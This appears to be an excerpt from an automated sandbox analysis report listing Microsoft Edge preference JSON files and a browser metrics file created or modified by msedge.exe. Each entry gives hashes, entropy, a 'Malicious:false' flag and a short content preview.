                                                                                                                                                                                                                                                                                    MD5:71DDEA006A2FFF80ECAF157F5C2AFC1B
                                                                                                                                                                                                                                                                                    SHA1:960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
                                                                                                                                                                                                                                                                                    SHA-256:091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
                                                                                                                                                                                                                                                                                    SHA-512:BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):46321
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.093327811081409
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6Jre4lb3cGoup1Xl3jVzXr4Cj:b/Ps+wsI7yO9wf6Dxrrchu3VlXr4CRoI
                                                                                                                                                                                                                                                                                    MD5:2D3174ECB00F257998FC1A848FBCB3FC
                                                                                                                                                                                                                                                                                    SHA1:D50BBAEBC6FF7E1D831F7BA47C3E2E115D49A3DA
                                                                                                                                                                                                                                                                                    SHA-256:DBA26D82FD5B2079DABB74A64B314D4D83A1548F6C24530138BEA2E2633A57F4
                                                                                                                                                                                                                                                                                    SHA-512:A1A699D5B0C56A79EB728D09EA0737E0A3B5D4C876CB4AE4DBE3985A72F5D75B098C65A5E54CD17FEB09A96FAB4623F93F49AF6CEC6FB82FD1627590240D1F36
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):47185
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.094559814470782
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6JretGTb3cGoup1Xl3jVzXr4r:b/Ps+wsI7yO9wf6DxrZchu3VlXr4CRoR
                                                                                                                                                                                                                                                                                    MD5:D38C9C3E6ABC0612A65D9FF9C365ACDA
                                                                                                                                                                                                                                                                                    SHA1:AD2D73B1EB7598EBB41DCF5B28D6C90FDEBA9BDE
                                                                                                                                                                                                                                                                                    SHA-256:696C7DC94C2BDE099F919837BD8CE2898F525876526B563A0088B79AC5874D90
                                                                                                                                                                                                                                                                                    SHA-512:EB17EC534998E1DEBD397F50565D18E59ED6623F64CCC90004A94339AF56B23A963A1B4E79B5B26C33455CEBA8E774AAA4C6264348AE9153BF0551EA9EB6156D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):46321
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.093342945646091
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6Jrez0b3cGoup1Xl3jVzXr4Cj:b/Ps+wsI7yO9wf6DxrPchu3VlXr4CRoI
                                                                                                                                                                                                                                                                                    MD5:A59ED78D6A1303AC8566A6A98F837525
                                                                                                                                                                                                                                                                                    SHA1:72CA640EDAECE7EEB84195F6FB5C442A52477AD2
                                                                                                                                                                                                                                                                                    SHA-256:AD242BC63C4D1B58DA3C94D8B9BBEAD590345AEAABC7956D007E7BFAFA44D3C7
                                                                                                                                                                                                                                                                                    SHA-512:8222F3E7CB77492D214A605FD7FF8EB0314A9237139B039EEC1F11D28E97CB2171D9445942AE077496DB9912210AD52DEE1F7FEC3AFDBFF7AADAF11AE970BA63
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):44640
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.095565665772922
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBwwuvhDO6vP6OjE6J6zbES06+cGoup1Xl3jVzXr4z:z/Ps+wsI7ynE36Dx5chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:30C9D4AD9153DCBE5CE0C462F5819348
                                                                                                                                                                                                                                                                                    SHA1:6D68C59DB6D81B8B3360333F3E9335F0A76463BC
                                                                                                                                                                                                                                                                                    SHA-256:AA599BB230C272D3AB291D3D0EBED783D74AEBD1204D587CE615266E129A282D
                                                                                                                                                                                                                                                                                    SHA-512:347697D2305A48B28FB7722F9C1AAF967428C63E16E498BAFB8CBFCD8D53032601279225499D4FD6F28CFC62BDC88620A8DDFFAB423B13D49803A8D9FA112C19
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):45493
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.092605055020019
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6JPdbh/pehcGoup1Xl3jVzXrD:b/Ps+wsI7yO9wf6DxOchu3VlXr4CRoI
                                                                                                                                                                                                                                                                                    MD5:B92AE72D6BB06FEC47957B786906EEAB
                                                                                                                                                                                                                                                                                    SHA1:CF9E8197CBA2F1233C492645AF3AA73CEC64B517
                                                                                                                                                                                                                                                                                    SHA-256:C078EE95F6E320F53AC803C54AFAFBFCAFE217E82CBDE01CE3161AA487898F44
                                                                                                                                                                                                                                                                                    SHA-512:81E636927F40463C935FDA32A1C635C416155CA0CE5D43389B70891911E139F4ECCFA30A61707010D95B57012174DFD89E678F6BF5BC6CB575772FE31F1D29B1
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44718
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.0955275272908995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBrwuvhDO6vP6OjE6Jygbh/pehcGoup1Xl3jVzXr4z:z/Ps+wsI7yOEW6DxAchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:76E8EDF54373F805D53944B741C36184
                                                                                                                                                                                                                                                                                    SHA1:BD148037091B5105D8A19CC59C2D16EF9AAA3C56
                                                                                                                                                                                                                                                                                    SHA-256:5900495CDA6EC8E0F5434FA25DBCEAA026FDC94239BFB69B02FA99BF1861E7F7
                                                                                                                                                                                                                                                                                    SHA-512:1EA759891E08BDCAD1ED23EE6E1F415B16C30C46B4FABDDA4582D8FADF5CF06784547088B8D70BF0A11344AE9E995A467BAA3CA913E57701FC927DED44B0ED48
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):47185
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.094559814470782
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6JretGTb3cGoup1Xl3jVzXr4r:b/Ps+wsI7yO9wf6DxrZchu3VlXr4CRoR
                                                                                                                                                                                                                                                                                    MD5:D38C9C3E6ABC0612A65D9FF9C365ACDA
                                                                                                                                                                                                                                                                                    SHA1:AD2D73B1EB7598EBB41DCF5B28D6C90FDEBA9BDE
                                                                                                                                                                                                                                                                                    SHA-256:696C7DC94C2BDE099F919837BD8CE2898F525876526B563A0088B79AC5874D90
                                                                                                                                                                                                                                                                                    SHA-512:EB17EC534998E1DEBD397F50565D18E59ED6623F64CCC90004A94339AF56B23A963A1B4E79B5B26C33455CEBA8E774AAA4C6264348AE9153BF0551EA9EB6156D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):47186
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.094533602315292
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6Jretx7b3cGoup1Xl3jVzXr4r:b/Ps+wsI7yO9wf6Dxrwchu3VlXr4CRoR
                                                                                                                                                                                                                                                                                    MD5:0264F001FF5F0577AF4B7B6C09FD6458
                                                                                                                                                                                                                                                                                    SHA1:76EA646389F62E7EDD9DC621A7910BEB4F7B6CD6
                                                                                                                                                                                                                                                                                    SHA-256:7F9E2FD3995697F3CF8A8F619590C415CC694FBD773C206BAF5987C39EE72F1F
                                                                                                                                                                                                                                                                                    SHA-512:84DD91A8E86C42F357BEA17D1EC22C66FC33F514DDA9D8F4B33D7C0F4194EC82A5F8336457E03153A1D3B4325AC586DFA1089B82CA26A9562F44F6106FE7B653
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):46321
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.093342945646091
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6Jrez0b3cGoup1Xl3jVzXr4Cj:b/Ps+wsI7yO9wf6DxrPchu3VlXr4CRoI
                                                                                                                                                                                                                                                                                    MD5:A59ED78D6A1303AC8566A6A98F837525
                                                                                                                                                                                                                                                                                    SHA1:72CA640EDAECE7EEB84195F6FB5C442A52477AD2
                                                                                                                                                                                                                                                                                    SHA-256:AD242BC63C4D1B58DA3C94D8B9BBEAD590345AEAABC7956D007E7BFAFA44D3C7
                                                                                                                                                                                                                                                                                    SHA-512:8222F3E7CB77492D214A605FD7FF8EB0314A9237139B039EEC1F11D28E97CB2171D9445942AE077496DB9912210AD52DEE1F7FEC3AFDBFF7AADAF11AE970BA63
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.2910283016050168
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:pmhERDUSpC+7IhMbyRG23bJJLQqqh/IXaOE7x9Mq9QG23:pCERASpx7oMb723bJJLQf6qOU9T9QG2
                                                                                                                                                                                                                                                                                    MD5:17E3DF57B961053F01DA07F41032B203
                                                                                                                                                                                                                                                                                    SHA1:ED77840F58CF7F6B0194CC4881CF6B2178392A2A
                                                                                                                                                                                                                                                                                    SHA-256:FF1376136472AA5008C422D34688098A21E5023F91BD3236C482507001BF8EDA
                                                                                                                                                                                                                                                                                    SHA-512:FDF3AB4D5D4A39799CE99D2AD4B3DBA952863C76C3403B5A772F4E7E97B8A0E48CE66A8AA2C20F1710C4CB2F688A15E9519D17AF0052230E54488B837F41E376
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...@..@...@.....C.].....@...............X...................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".jlwvtg20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(.....................$..<.w..U?:K.'D.I..G.......W6....{....>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.......
